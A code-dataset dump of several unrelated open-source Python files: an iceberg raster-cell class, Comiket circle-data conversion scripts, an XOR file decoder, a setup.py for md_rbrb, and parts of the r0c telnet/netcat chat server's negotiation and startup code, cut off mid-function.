@y.deleter def y(self): print('You cannot delete the ice y attributes.') return @property def radar(self): """The radar value associated with the ice cell. Specify the conditions to get_radar, set_radar, and del_radar. """ return self._radar @radar.setter def radar(self, value): self._radar = value @radar.deleter def radar(self): print('You cannot delete the radar attribute.') return @property def lidar(self): """The lidar value associated with the ice cell. Specify the conditions to get_lidar, set_lidar, and del_lidar. """ return self._lidar @lidar.setter def lidar(self, value): self._lidar = value @lidar.deleter def lidar(self): print('You cannot delete the lidar attribute.') return @property def id(self): """The identification number given to each cell of ice to specify which iceberg it is associated with. Specify the conditions to get_id, the conditions to set_id, and the conditions to del_id """ return self._id @id.setter def id(self, value): if self._id > 0: print('Cannot change iceberg ID.') else: self._id = value @id.deleter def id(self): print('You cannot delete the iceberg ID.') return @property def height(self): """The height of the ice above sea level. Specify the conditions to get_height, the conditions to set_height, and the conditions to del_height. """ return self._height @height.setter def height(self, value): self._height = value @height.deleter def height(self): print('You cannot delete the height attribute.') return @property def volume_asl(self): """The volume of ice above sea level at the specified terrain position (raster cell). Specify the conditions to get_volume_asl, the conditions to set_volume_asl, and the conditions to del_volume_asl. 
""" return self._volume_asl @volume_asl.setter def volume_asl(self, value): self._volume_asl = value @volume_asl.deleter def volume_asl(self): print('You cannot delete the volume_asl attribute.') return @property def volume_tot(self): """The total volume of ice above and below sea level at the specified terrain position (raster cell). Specify the conditions to get_volume_tot, the conditions to set_volume_tot, and the conditions to del_volume_tot. """ return self._volume_tot @volume_tot.setter def volume_tot(self, value): self._volume_tot = value @volume_tot.deleter def volume_tot(self): print('You cannot delete the volume_tot attribute.') return @property def mass_asl(self): """The mass of ice above sea level at the specified terrain position (raster cell). Specify the conditions to get_mass_asl, the conditions to set_mass_asl, and the conditions to del_mass_asl. """ return self._mass_asl @mass_asl.setter def mass_asl(self, value): self._mass_asl = value @mass_asl.deleter def mass_asl(self): print('You cannot delete the mass_asl attribute.') return @property def mass_tot(self): """The total mass of ice above and below sea level at the specified terrain position (raster cell). Specify the conditions to get_mass_tot, the conditions to set_mass_tot, and the conditions to del_mass_tot. """ return self._mass_tot @mass_tot.setter def mass_tot(self, value): self._mass_tot = value @mass_tot.deleter def mass_tot(self): print('You cannot delete the mass_tot attribute.') return @property def cols_radar(self): """The number of columns in the raster grid of the radar data (the lidar data should have the same number of columns). Specify the conditions to get_cols_radar, set_cols_radar, and del_cols_radar. """ return self._cols_radar @cols_radar.setter def cols_radar(self, value): self._cols_radar = value @cols_radar.deleter def cols_radar(self): print('You cannot delete the cols_radar attribute.') return @property def neighbours(self): """A list of the adjacent ice cells in the raster grid. Specify the conditions to get_neighbours, set_neighbours, and del_neighbours. """ return self._neighbours @neighbours.setter def neighbours(self, value): print('Cannot change neighbours attribute.') @neighbours.deleter def neighbours(self): print('You cannot delete the neighbours attribute.') return @property def tug(self): """A boolean property which identifies whether the ice cell is part of an iceberg that can be tugged. Specify the conditions to get_tug, set_tug, and del_tug. """ return self._tug @tug.setter def tug(self, value): if self._tug > 0: print('Cannot change the assigned tug attribute.') self._tug = value @tug.deleter def tug(self): print('You cannot delete the tug attribute.') return class Sea: """Assign attributes to each identified non-ice cell (assumed sea). """ def __init__(self, i, j, radar, lidar): """Assign attributes to each identified ice cell. """ self._x = i self._y = j self._radar = self self._lidar = lidar[i][j] @property def x(self): """The x position (easting). Specify the conditions to get_x, set_x, and del_x. """ if self._x < self._cols_radar: return self._x else: print('The x value is outside of the acceptable range.') @x.setter def x(self, value): if isinstance(value, int) == False: print('x value must be integer') return if 0 <= value <= self._cols_radar: self._x = value else: print('x value entered is outside of the acceptable range') @x.deleter def x(self): print('You cannot delete the x attribute.') return @property def y(self): """The y position (northing). 
Specify the conditions to get_y, the conditions to set_y and the conditions to del_y. """ if self._y < self._cols_radar: return self._y else: print('The y value is outside of the acceptable range.') @y.setter def y(self, value): if isinstance(value, int) == False: print('y value must be integer') return if 0 <= value <= self._cols_radar: self._y = value else: print('y value entered is outside of the acceptable range') @y.deleter def y(self): print('You cannot delete the y attribute.') return @property def radar(self): """The radar value associated with the sea cell. Specify the conditions to get_radar, set_radar, and del_radar. """ return self._radar @radar.setter def radar(self, value): self._radar = value @radar.deleter def radar(self): print('You cannot delete the radar attribute.') return @property def lidar(self): """The lidar value associated with the sea cell. Specify the conditions to get_lidar, set_lidar, and del_lidar. """ return self._lidar @lidar.setter def lidar(self, value): self._lidar = value @lidar.deleter def lidar(self): print('You cannot delete the lidar attribute.') return ```
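Every attribute in the classes above repeats a near-identical property/setter/deleter triple. A sketch of how the "plain get/set, forbid delete" cases could be factored into a single descriptor; `Guarded` and `Cell` are illustrative names, not part of the model:

```python
class Guarded:
    """Plain get/set; deleting raises instead of printing a warning."""
    def __set_name__(self, owner, name):
        self.name = "_" + name

    def __get__(self, obj, objtype=None):
        return getattr(obj, self.name)

    def __set__(self, obj, value):
        setattr(obj, self.name, value)

    def __delete__(self, obj):
        raise AttributeError("cannot delete " + self.name[1:])

class Cell:
    radar = Guarded()
    lidar = Guarded()

c = Cell()
c.radar = 42
assert c.radar == 42   # `del c.radar` would raise AttributeError
```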
{ "source": "9001/battleplan", "score": 3 }
#### File: battleplan/tools/csv2html-03-json.py ```python import os import sys import csv import codecs import operator import romkan import jaconv import html import unicodedata import json SJIS_WARN = False s1 = u"アイウエオカキクケコ" # a=wall s2 = u"サシスセソタチツテト" s3 = u"ナニヌネノハヒフヘホ" # na=wall s4 = u"マミムメモヤユヨラリ" w1a = u"れぬねのはひふへほまみむめも" # re=wall w1b = u"やゆよらりる" w2a = u"あくけこさしすせそたちつてと" # a=wall w2b = u"いうえおかき" w3a = u"ABCDEFGHIJKL" # a=wall w3b = u"MNOPQR" all_rows = w3a + w3b + w2a + w2b + w1a + w1b + s1 + s2 + s3 + s4 all_halls = { "s1": s1, "s2": s2, "s3": s3, "s4": s4, "w1a": w1a, "w1b": w1b, "w2a": w2a, "w2b": w2b, "w3a": w3a, "w3b": w3b, } all_days = ['土', '日', '月', '火'] def main(): r = [] print("loading csv") with open(sys.argv[1], "r", encoding="utf-8") as fgz: fcsv = csv.reader(fgz, delimiter=",") for cr in fcsv: if cr[0] != "Circle": # print('skipping; cr[0] =', cr[0]) continue if len(cr) != 29: raise Exception("unexpected num fields {}".format(len(cr))) v = { "imageid": cr[1], "ccc-gui-color-probably": cr[2], "ccc-gui-page-number": cr[3], "ccc-gui-page-offset": cr[4], "day": cr[5], "hall": cr[6], "row": cr[7], "col": cr[8], "ngenre": cr[9], "cirnam1": cr[10], "cirnam2": cr[11], "authnam": cr[12], "prodnam": cr[13], "urlmain": cr[14], "mail": cr[15], "desc": cr[16], "x7": cr[17], # always blank "x": cr[18], "y": cr[19], "x10": cr[20], "subcol": "ab"[int(cr[21])], "description": cr[22], "urlcata": cr[23], "urlcirc": cr[24], "x13": cr[25], # always blank "urltwit": cr[26], "urlpxiv": cr[27], "x14": cr[28], # always blank } v["loc"] = "".join( [v["hall"], v["row"], str(v["col"]).rjust(2, "0"), v["subcol"]] ) r.append(v) for nday, cday in enumerate(all_days, 1): print("writing day {}".format(nday)) ret = [] rd = [x for x in r if x["day"] == cday] for hallname, rows in sorted(all_halls.items()): for row in rows: for v in [x for x in rd if x["row"] == row]: romaji = jaconv.h2z(v["cirnam2"]) romaji = romkan.to_roma(romaji) entry = { "loc": str(nday) + v["loc"], "kan": v["cirnam1"], "rom": romaji, "x": v["x"], "y": v["y"], } if v["x13"] or v["x14"]: print(v) print(v["x13"]) print(v["x14"]) print(" !!!!!!!!!!!!!!!!!!!\n") urls = [] for k in ["urlmain", "urlcata", "urlcirc", "urltwit", "urlpxiv"]: url = v[k] if ( "://webcatalog.circle.ms/Circle/" in url or "://portal.circle.ms/Circle/Index" in url or len(url) < 5 or url in urls ): continue urls.append(url) if urls: entry["url"] = urls ret.append(entry) with open("../bp/lkrxy{}.json".format(nday), "wb") as f: f.write( json.dumps(ret, sort_keys=True) .replace('"}, {"kan": "', '"},\n{"kan": "') .encode("utf-8") ) main() ``` #### File: battleplan/tools/db2json.py ```python import os import sys import csv import gzip import codecs import operator import romkan import jaconv import html import unicodedata import json import sqlite3 SJIS_WARN = False s1 = u"アイウエオカキクケコ" # a=wall s2 = u"サシスセソタチツテト" s3 = u"ナニヌネノハヒフヘホ" # na=wall s4 = u"マミムメモヤユヨラリ" w1a = u"れぬねのはひふへほまみむめも" # re=wall w1b = u"やゆよらりる" w2a = u"あくけこさしすせそたちつてと" # a=wall w2b = u"いうえおかき" w3a = u"ABCDEFGHIJKL" # a=wall w3b = u"MNOPQR" all_rows = w3a + w3b + w2a + w2b + w1a + w1b + s1 + s2 + s3 + s4 all_halls = { "s1": s1, "s2": s2, "s3": s3, "s4": s4, "w1a": w1a, "w1b": w1b, "w2a": w2a, "w2b": w2b, "w3a": w3a, "w3b": w3b, } all_days = ['土', '日', '月', '火'] def main(): conn = sqlite3.connect(sys.argv[1]) # conn.text_factory = lambda x: str(x, "sjis") cur = conn.cursor() cur.execute("select code, name from ComiketGenre") rows = cur.fetchall() for row in rows: print(row) cur = conn.cursor() cur.execute( 
"select id, day, blockId, spaceNo, spaceNoSub, genreId, circleName, circleKana from ComiketCircle" ) rows = cur.fetchall() for row in rows: print(row) main() ``` #### File: battleplan/tools/xor.py ```python keys = [ b'\<KEY>', #<KEY>', ] import os import sys def main(): with open(sys.argv[1], 'rb') as f: while True: for key in keys: dbuf = f.read(0x400) if len(dbuf) == 0: return kbuf = key[:] while len(kbuf) < len(dbuf): kbuf += key sys.stdout.buffer.write( bytes(a ^ b for a, b in zip(dbuf, kbuf))) main() ```
{ "source": "9001/md_rbrb", "score": 2 }
#### File: 9001/md_rbrb/setup.py ```python from __future__ import print_function import io import os import sys from glob import glob from shutil import rmtree try: # need setuptools to build wheel from setuptools import setup, Command setuptools_available = True except ImportError: # works in a pinch from distutils.core import setup, Command setuptools_available = False from distutils.spawn import spawn if 'bdist_wheel' in sys.argv and not setuptools_available: print('cannot build wheel without setuptools') sys.exit(1) NAME = 'md_rbrb' VERSION = None data_files = [ ('share/doc/md_rbrb', ['README.md','README.rst','LICENSE']) ] manifest = '' for dontcare, files in data_files: for fn in files: manifest += "include {0}\n".format(fn) here = os.path.abspath(os.path.dirname(__file__)) with open(here + '/MANIFEST.in', 'wb') as f: f.write(manifest.encode('utf-8')) with open(here + '/md_rbrb.py', 'rb') as f: for ln in [x.decode('utf-8') for x in f]: if ln.startswith('__version__'): exec(ln) break try: LONG_DESCRIPTION = '' LDCT = '' with open(here + '/README.rst', 'rb') as f: txt = f.read().decode('utf-8') #txt = txt[txt.find('`'):] LONG_DESCRIPTION = txt LDCT = 'text/x-rst' except: print('\n### could not open README.rst ###\n') with open(here + '/README.md', 'rb') as f: txt = f.read().decode('utf-8') LONG_DESCRIPTION = txt LDCT = 'text/markdown' class clean2(Command): description = 'Cleans the source tree' user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): os.system('{0} setup.py clean --all'.format(sys.executable)) try: rmtree('./dist') except: pass try: rmtree('./md_rbrb.egg-info') except: pass nuke = [] for (dirpath, dirnames, filenames) in os.walk('.'): for fn in filenames: if fn.endswith('.rst') \ or fn.endswith('.pyc') \ or fn.endswith('.pyo') \ or fn.endswith('.pyd') \ or fn.startswith('MANIFEST'): nuke.append(dirpath + '/' + fn) for fn in nuke: os.unlink(fn) class rstconv(Command): description = 'Converts markdown to rst' user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): self.proc_dir('.') self.proc_dir('docs') def proc_dir(self, path): import m2r for (dirpath, dirnames, filenames) in os.walk(path): dirnames.sort() for fn in sorted(filenames): fn = dirpath + '/' + fn if not fn.endswith('.md'): continue rst_fn = fn[:-3] + '.rst' with open(fn, 'rb') as f: md = f.read().decode('utf-8') for kw in ['docs/help-']: md = md.replace('({0}'.format(kw), '(https://github.com/9001/r0c/blob/master/{0}'.format(kw)) for kw in ['docs','clients']: md = md.replace('({0}/'.format(kw), '(https://ocv.me/static/r0c/{0}/'.format(kw)) md = md.replace('* **[', '* [').replace(')** <-', ') <-') rst = m2r.convert(md) rst = rst.replace(':raw-html-m2r:`<del>', ':sub:`') rst = rst.replace('</del>`', '`') with open(rst_fn, 'wb') as f: f.write(rst.encode('utf-8')) args = { 'name' : NAME, 'version' : __version__, 'description' : 'multilanguage Rabi-Ribi display', 'long_description' : LONG_DESCRIPTION, 'long_description_content_type' : LDCT, 'author' : 'ed', 'author_email' : '<EMAIL>', 'url' : 'https://github.com/9001/md_rbrb', 'license' : 'MIT', 'data_files' : data_files, 'classifiers' : [ 'Development Status :: 5 - Production/Stable', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.0', 'Programming 
Language :: Python :: 3.1', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Topic :: Games/Entertainment :: Side-Scrolling/Arcade Games', 'Intended Audience :: End Users/Desktop', 'Operating System :: Microsoft :: Windows', 'Environment :: Console' ], 'cmdclass' : { 'rstconv': rstconv, 'clean2': clean2 } } if setuptools_available: args.update({ 'install_requires' : [], 'include_package_data' : True, 'py_modules' : ['md_rbrb'], 'entry_points' : """ [console_scripts] md_rbrb = md_rbrb:main """ }) else: args.update({ 'packages' : ['md_rbrb'], 'scripts' : ['bin/md_rbrb'] }) #import pprint #pprint.PrettyPrinter().pprint(args) #sys.exit(0) setup(**args) ```
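The setup.py above single-sources the version by scanning md_rbrb.py for the line starting with `__version__` and exec-ing it. A hedged sketch of the same pattern that parses the value instead of executing it (the regex variant is my substitution, not the project's code):

```python
import re

def read_version(path):
    # pull __version__ out of a module without importing it, so
    # packaging works even if the module's runtime deps are missing
    with open(path, "rb") as f:
        for ln in f:
            m = re.match(r'__version__\s*=\s*[\'"]([^\'"]+)', ln.decode("utf-8"))
            if m:
                return m.group(1)
    raise RuntimeError("no __version__ in " + path)
```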
{ "source": "9001/r0c", "score": 2 }
#### File: r0c/r0c/itelnet.py ```python from __future__ import print_function from .__init__ import EP, PY2 from . import util as Util from . import ivt100 as Ivt100 import time import struct print = Util.print # from net::telnet (telnet.rb) doc by <NAME> and <NAME> # OPT_([^ ]*) .*("\\x..") # (.*) # \2 = "\1 \3", subjects = { b"\x00": "BINARY (Binary Transmission)", b"\x01": "ECHO (Echo)", b"\x02": "RCP (Reconnection)", b"\x03": "SGA (Suppress Go Ahead)", b"\x04": "NAMS (Approx Message Size Negotiation)", b"\x05": "STATUS (Status)", b"\x06": "TM (Timing Mark)", b"\x07": "RCTE (Remote Controlled Trans and Echo)", b"\x08": "NAOL (Output Line Width)", b"\x09": "NAOP (Output Page Size)", b"\x0a": "NAOCRD (Output Carriage-Return Disposition)", b"\x0b": "NAOHTS (Output Horizontal Tab Stops)", b"\x0c": "NAOHTD (Output Horizontal Tab Disposition)", b"\x0d": "NAOFFD (Output Formfeed Disposition)", b"\x0e": "NAOVTS (Output Vertical Tabstops)", b"\x0f": "NAOVTD (Output Vertical Tab Disposition)", b"\x10": "NAOLFD (Output Linefeed Disposition)", b"\x11": "XASCII (Extended ASCII)", b"\x12": "LOGOUT (Logout)", b"\x13": "BM (Byte Macro)", b"\x14": "DET (Data Entry Terminal)", b"\x15": "SUPDUP (SUPDUP)", b"\x16": "SUPDUPOUTPUT (SUPDUP Output)", b"\x17": "SNDLOC (Send Location)", b"\x18": "TTYPE (Terminal Type)", b"\x19": "EOR (End of Record)", b"\x1a": "TUID (TACACS User Identification)", b"\x1b": "OUTMRK (Output Marking)", b"\x1c": "TTYLOC (Terminal Location Number)", b"\x1d": "3270REGIME (Telnet 3270 Regime)", b"\x1e": "X3PAD (X.3 PAD)", b"\x1f": "NAWS (Negotiate About Window Size)", b"\x20": "TSPEED (Terminal Speed)", b"\x21": "LFLOW (Remote Flow Control)", b"\x22": "LINEMODE (Linemode)", b"\x23": "XDISPLOC (X Display Location)", b"\x24": "OLD_ENVIRON (Environment Option)", b"\x25": "AUTHENTICATION (Authentication Option)", b"\x26": "ENCRYPT (Encryption Option)", b"\x27": "NEW_ENVIRON (New Environment Option)", b"\xff": "EXOPL (Extended-Options-List)", } verbs = {b"\xfe": "DONT", b"\xfd": "DO", b"\xfc": "WONT", b"\xfb": "WILL"} xff = b"\xff" xf0 = b"\xf0" neg_will = neg_wont = neg_dont = initial_neg = None def init(ar): global subjects, verbs, xff, xf0, neg_will, neg_wont, neg_dont, initial_neg if not ar.linemode: # standard operation procedure; # we'll handle all rendering neg_will = [ b"\x1f", # negotiate window size b"\x01", # echo b"\x03", # suppress go-ahead ] neg_wont = [] neg_dont = [b"\x25"] # authentication initial_neg = b"" initial_neg += b"\xff\xfb\x03" # will sga initial_neg += b"\xff\xfb\x01" # will echo initial_neg += b"\xff\xfd\x1f" # do naws else: # debug / negative test; # have client linebuffer # (reminder that windows telnet refuses to linemode) # (but dont use that to detect telnet.exe because some clients kinda # require an exact negotiation order and this permutation works) neg_will = [b"\x1f"] # negotiate window size neg_wont = [b"\x01", b"\x03"] # echo # suppress go-ahead initial_neg = b"" # initial_neg += b'\xff\xfc\x03' # won't sga # initial_neg += b'\xff\xfc\x01' # won't echo initial_neg += b"\xff\xfd\x01" # do echo initial_neg += b"\xff\xfd\x22" # do linemode initial_neg += b"\xff\xfd\x1f" # do naws if not PY2: xff = 0xFF xf0 = 0xF0 def dict_2to3(src): ret = {} for k, v in src.items(): ret[k[0]] = v return ret def list_2to3(src): ret = [] for v in src: ret.append(v[0]) return ret verbs = dict_2to3(verbs) subjects = dict_2to3(subjects) neg_will = list_2to3(neg_will) neg_wont = list_2to3(neg_wont) class TelnetServer(Ivt100.VT100_Server): def __init__(self, host, port, world, 
other_if): Ivt100.VT100_Server.__init__(self, host, port, world, other_if) self.user_config_path = EP.log + "cfg.telnet" def gen_remote(self, socket, addr, user): return TelnetClient(self, socket, addr, self.world, user) class TelnetClient(Ivt100.VT100_Client): def __init__(self, host, socket, address, world, user): Ivt100.VT100_Client.__init__(self, host, socket, address, world, user) # if self.ar.linemode: # self.y_input, self.y_status = self.y_status, self.y_input self.neg_done = [] self.replies.put(initial_neg) def handle_read(self): with self.world.mutex: if self.dead: print("\033[1;31mXXX reading when dead\033[0m") return try: data = self.socket.recv(8192) if not data: raise Exception() except: self.handle_close() return if self.ar.hex_rx: Util.hexdump(data, "-->>") if self.wire_log and self.ar.log_rx: self.wire_log.write( "{0:.0f}\n".format(time.time() * 1000).encode("utf-8") ) Util.hexdump(data, ">", self.wire_log) self.in_bytes += data text_len = len(self.in_text) full_redraw = False while self.in_bytes: len_at_start = len(self.in_bytes) decode_until = len_at_start # if the codec allows \xff as the 1st byte of a rune, # make sure it doesn't consume it if not self.inband_will_fail_decode: ofs = self.in_bytes.find(b"\xff") if ofs >= 0: decode_until = ofs try: src = u"{0}".format(self.in_bytes[:decode_until].decode(self.codec)) # print('got {0} no prob'.format(src)) # print('got {0} runes: {1}'.format(len(src), # b2hex(src.encode('utf-8')))) self.in_bytes = self.in_bytes[decode_until:] except UnicodeDecodeError as uee: uee.start += self.uee_offset is_inband = ( decode_until > uee.start and self.in_bytes[uee.start] == xff ) is_partial = decode_until < uee.start + 6 and self.multibyte_codec if is_inband or is_partial: if self.ar.dbg and is_partial and not is_inband: print( "need more data to parse unicode codepoint at {0} in {1}/{2}".format( uee.start, decode_until, len(self.in_bytes) ) ) Util.hexdump( self.in_bytes[max(0, decode_until - 8) : decode_until], "XXX ", ) src = u"{0}".format( self.in_bytes[: uee.start].decode(self.codec) ) self.in_bytes = self.in_bytes[uee.start :] if is_partial and not is_inband: self.in_text += src break else: # it can't be helped print( "unparseable client data at {0} in {1}/{2}:".format( uee.start, decode_until, len(self.in_bytes) ) ) Util.hexdump(self.in_bytes, "XXX ") try: src = u"{0}".format( self.in_bytes[:decode_until].decode( self.codec, "backslashreplace" ) ) except: src = u"[ unfixable text corruption ]" # can happen in py2 self.in_bytes = self.in_bytes[decode_until:] self.in_text += src if self.wizard_stage is not None and len(self.in_text_full) < 1024: self.in_text_full += src if self.in_bytes and self.in_bytes[0] == xff: # cmd = b''.join([self.in_bytes[:3]]) cmd = self.in_bytes[:3] if len(cmd) < 3: print("need more data for generic negotiation") break self.num_telnet_negotiations += 1 if verbs.get(cmd[1]): self.in_bytes = self.in_bytes[3:] if not subjects.get(cmd[2]): m = "[X] subject not implemented: [{0}]" print(m.format(Util.b2hex(cmd))) continue if self.ar.dbg: print( "-->> negote: {0} {1} {2}".format( Util.b2hex(cmd), verbs.get(cmd[1]), subjects.get(cmd[2]), ) ) response = None if cmd in self.neg_done: if self.ar.dbg: print("-><- n.loop: {0}".format(Util.b2hex(cmd))) elif cmd[:2] == b"\xff\xfe": # dont response = b"\xfc" # will not if cmd[2] in neg_will: response = b"\xfb" # will elif cmd[:2] == b"\xff\xfd": # do response = b"\xfb" # will if cmd[2] in neg_wont: response = b"\xfc" # will not if response is not None: if self.ar.dbg: print( 
"<<-- n.resp: {0} {1} -> {2}".format( Util.b2hex(cmd[:3]), verbs.get(cmd[1]), verbs.get(response[0]), ) ) self.replies.put(b"".join([b"\xff", response, cmd[2:3]])) self.neg_done.append(cmd) elif cmd[1] == b"\xfa"[0] and len(self.in_bytes) >= 3: eon = self.in_bytes.find(b"\xff\xf0") if eon <= 0: # print('invalid subnegotiation:') # hexdump(self.in_bytes, 'XXX ') # self.in_bytes = self.in_bytes[0:0] print( "need more data for sub-negotiation: {0}".format( Util.b2hex(self.in_bytes) ) ) break else: # cmd = b''.join([self.in_bytes[:12]]) # at least 9 cmd = self.in_bytes[:eon] self.in_bytes = self.in_bytes[eon + 2 :] if self.ar.dbg: print("-->> subneg: {0}".format(Util.b2hex(cmd))) if cmd[2] == b"\x1f"[0]: full_redraw = True # spec says to send \xff\xff in place of \xff # for literals in negotiations, some clients do while True: ofs = cmd.find(b"\xff\xff") if ofs < 0: break cmd = cmd[:ofs] + cmd[ofs + 1 :] if self.ar.dbg: print(" : {0}".format(Util.b2hex(cmd))) self.set_term_size(*struct.unpack(">HH", cmd[3:7])) else: print("=== invalid negotiation:") Util.hexdump(self.in_bytes, "XXX ") self.in_bytes = self.in_bytes[0:0] if len(self.in_bytes) == len_at_start: print("=== unhandled data from client:") Util.hexdump(self.in_bytes, "XXX ") self.in_bytes = self.in_bytes[0:0] break self.read_cb(full_redraw, len(self.in_text) - text_len) ``` #### File: r0c/r0c/__main__.py ```python from __future__ import print_function from .__version__ import S_VERSION from .__init__ import EP, WINDOWS, COLORS, unicode from . import util as Util from . import inetcat as Inetcat from . import itelnet as Itelnet from . import world as World import os import sys import time import signal import select import threading from datetime import datetime print = Util.print """r0c.py: retr0chat Telnet/Netcat Server""" __author__ = "ed <<EMAIL>>" __credits__ = ["stackoverflow.com"] __license__ = "MIT" __copyright__ = 2018 __url__ = "https://github.com/9001/r0c" if "r0c" not in sys.modules: print( "\r\n retr0chat must be launched as a module.\r\n in the project root, run this:\r\n\r\n python3 -m r0c\r\n" ) sys.exit(1) def optgen(ap, pwd): ac = ap u = unicode pt, pn = [23, 531] if WINDOWS or not os.getuid() else [2323, 1531] # fmt: off ac.add_argument("-i", metavar="IP", type=u, default="0.0.0.0", help="address to listen on") ac.add_argument("-pt", type=int, default=pt, help="telnet port (disable with 0)") ac.add_argument("-pn", type=int, default=pn, help="netcat port (disable with 0)") ac.add_argument("-pw", metavar="PWD", type=u, default=pwd, help="admin password") ac.add_argument("--nsalt", metavar="TXT", type=u, default="lammo/", help="salt for generated nicknames based on IP") ac = ap.add_argument_group("logging") ac.add_argument("--log-rx", action="store_true", help="log incoming traffic from clients") ac.add_argument("--log-tx", action="store_true", help="log outgoing traffic to clients") ac.add_argument("--rot-msg", metavar="N", type=int, default=131072, help="max num msgs per logfile") ac = ap.add_argument_group("perf") ac.add_argument("--hist-rd", metavar="N", type=int, default=65535, help="max num msgs to load from disk when joining a channel") ac.add_argument("--hist-mem", metavar="N", type=int, default=98303, help="max num msgs to keep in channel scrollback") ac.add_argument("--hist-tsz", metavar="N", type=int, default=16384, help="num msgs to discard when chat exceeds hist-mem") ac = ap.add_argument_group("debug") ac.add_argument("--dbg", action="store_true", help="show negotiations etc") ac.add_argument("--hex-rx", 
action="store_true", help="print incoming traffic from clients") ac.add_argument("--hex-tx", action="store_true", help="print outgoing traffic to clients") ac.add_argument("--hex-lim", metavar="N", type=int, default=128, help="filter packets larger than N bytes from being hexdumped") ac.add_argument("--hex-w", metavar="N", type=int, default=16, help="width of the hexdump, in bytes per line, mod-8") ac.add_argument("--thr-mon", action="store_true", help="start monitoring threads on ctrl-c") ac.add_argument("--linemode", action="store_true", help="force clients into linemode (to debug linemode UI)") ac.add_argument("--bench", action="store_true", help="dump statistics every 2 sec") # fmt: on class Fargparse(object): def __init__(self): pass def add_argument_group(self, *a, **ka): return self def add_argument(self, opt, default=False, **ka): setattr(self, opt.lstrip("-").replace("-", "_"), default) def run_fap(argv, pwd): ap = Fargparse() optgen(ap, pwd) if "-h" in unicode(argv + [""])[1]: print() print("arg 1: Telnet port (0=disable), default: {0}".format(ap.pt)) print("arg 2: NetCat port (0=disable), default: {0}".format(ap.pn)) print("arg 3: admin password, default: {0}".format(ap.pw)) print() sys.exit(0) try: setattr(ap, "pt", int(argv[1])) setattr(ap, "pn", int(argv[2])) setattr(ap, "pw", unicode(argv[3])) except: pass return ap try: import argparse class RiceFormatter(argparse.HelpFormatter): def _get_help_string(self, action): """ same as ArgumentDefaultsHelpFormatter(HelpFormatter) except the help += [...] line now has colors """ fmt = "\033[36m (default: \033[35m%(default)s\033[36m)\033[0m" if not COLORS: fmt = " (default: %(default)s)" help = action.help if "%(default)" not in action.help: if action.default is not argparse.SUPPRESS: defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE] if action.option_strings or action.nargs in defaulting_nargs: help += fmt return help def _fill_text(self, text, width, indent): """same as RawDescriptionHelpFormatter(HelpFormatter)""" return "".join(indent + line + "\n" for line in text.splitlines()) class Dodge11874(RiceFormatter): def __init__(self, *args, **kwargs): kwargs["width"] = 9003 super(Dodge11874, self).__init__(*args, **kwargs) def run_ap(argv, pwd): throw = False for formatter in [RiceFormatter, Dodge11874]: try: ap = argparse.ArgumentParser(formatter_class=formatter, prog="r0c") optgen(ap, pwd) return ap.parse_args(args=argv[1:]) except AssertionError: if throw: raise throw = True except: run_ap = run_fap class Core(object): def __init__(self): pass def start(self, argv=None): if WINDOWS and COLORS: os.system("rem") # best girl if argv is None: argv = sys.argv for d in ["pm", "chan", "wire"]: try: os.makedirs(EP.log + d) except: pass print(" * r0c {0}, py {1}".format(S_VERSION, Util.host_os())) pwd = "<PASSWORD>" pwd_file = os.path.join(EP.app, "password.txt") if os.path.isfile(pwd_file): print(" * Password from " + pwd_file) with open(pwd_file, "rb") as f: pwd = f.read().decode("utf-8").strip() # old argv syntax compat try: _ = int(argv[1]) rap = run_fap except: rap = run_ap ar = self.ar = rap(argv, pwd) Util.HEX_WIDTH = ar.hex_w Itelnet.init(ar) for srv, port in [["Telnet", ar.pt], ["NetCat", ar.pn]]: if port: print(" * {0} server on port {1}".format(srv, port)) else: print(" * {0} server disabled".format(srv)) if ar.pw == "hunter2": print("\033[1;31m") print(" using the default password;") print(" change it with argument -pw") print(" or save it here: " + pwd_file) print("\033[0m") print(" * Logs at " + EP.log) 
Util.compat_chans_in_root() self.stopping = 0 self.threadmon = False self.shutdown_flag = threading.Event() Util.py26_threading_event_wait(self.shutdown_flag) print(" * Capturing ^C") for sig in [signal.SIGINT, signal.SIGTERM]: signal.signal(sig, self.signal_handler) print(" * Creating world") self.world = World.World(self) self.servers = [] if ar.pt: print(" * Starting Telnet server") self.telnet_server = Itelnet.TelnetServer(ar.i, ar.pt, self.world, ar.pn) self.servers.append(self.telnet_server) if ar.pn: print(" * Starting NetCat server") self.netcat_server = Inetcat.NetcatServer(ar.i, ar.pn, self.world, ar.pt) self.servers.append(self.netcat_server) print(" * Loading user configs") for server in self.servers: server.load_configs() print(" * Starting push driver") self.push_thr = threading.Thread( target=self.push_worker, args=(self.world, self.servers), name="push", ) # self.push_thr.daemon = True self.push_thr.start() print(" * Running") self.select_thr = threading.Thread(target=self.select_worker, name="selector") self.select_thr.daemon = True self.select_thr.start() return True def run(self): print(" * r0c is up ^^,") if not self.ar.bench: try: timeout = 69 if WINDOWS: # ctrl-c does not raise timeout = 0.69 while not self.shutdown_flag.wait(timeout): pass except: pass else: last_joins = 0 last_parts = 0 last_messages = 0 while not self.shutdown_flag.is_set(): for n in range(20): if self.shutdown_flag.is_set(): break time.sleep(0.1) print( "{0:.3f} j {1} p {2} m {3} d {4},{5},{6}".format( time.time(), self.world.num_joins, self.world.num_parts, self.world.num_messages, self.world.num_joins - last_joins, self.world.num_parts - last_parts, self.world.num_messages - last_messages, ) ) last_joins = self.world.num_joins last_parts = self.world.num_parts last_messages = self.world.num_messages # terminate refresh_chans self.world.dirty_ch = {} self.world.dirty_flag.set() with self.world.mutex: pass print(" * saving user configs") for server in self.servers: server.save_configs() print(" * terminating world") self.world.shutdown() print(" * selector cleanup") for server in self.servers: server.srv_sck.close() print(" * r0c is down") return True def select_worker(self): srvs = {} for iface in self.servers: srvs[iface.srv_sck] = iface sn = -1 sc = {} slow = {} # sck:cli fast = {} next_slow = 0 timeout = None while not self.shutdown_flag.is_set(): nsn = self.world.cserial if sn != nsn: sn = nsn sc = {} slow = {} fast = {} for srv in self.servers: 